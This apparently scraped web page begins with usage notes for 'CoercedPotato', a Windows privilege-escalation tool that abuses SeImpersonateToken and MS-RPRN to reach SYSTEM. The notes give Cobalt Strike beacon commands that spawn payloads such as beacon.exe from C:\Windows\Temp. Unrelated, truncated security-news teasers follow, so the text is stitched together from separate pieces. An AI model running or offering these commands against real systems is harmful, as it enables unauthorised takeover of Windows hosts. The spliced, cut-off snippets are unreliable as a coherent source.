Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.
Reflective Loader from
Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.
You first need to spawn the RPC listener with
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument for example
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin then you can trigger a SYSTEM call
beacon> CoercedPotato coerce In MySQL Server 5.5 and earlier versions, the MyISAM was the default storage engine. So,…
A newly disclosed vulnerability in Microsoft Authenticator could expose one time sign in codes or…
Modrinth is a modern platform that’s rapidly changing the landscape of Minecraft modding, providing an…
A new, highly sophisticated malware campaign named BlackSanta has emerged, primarily targeting HR and recruitment…
Perplexity has unveiled an exciting new feature, Personal Computer, which allows AI agents to seamlessly…
In a recent cyber incident, a group named CARDINAL, associated with the label Russian Legion,…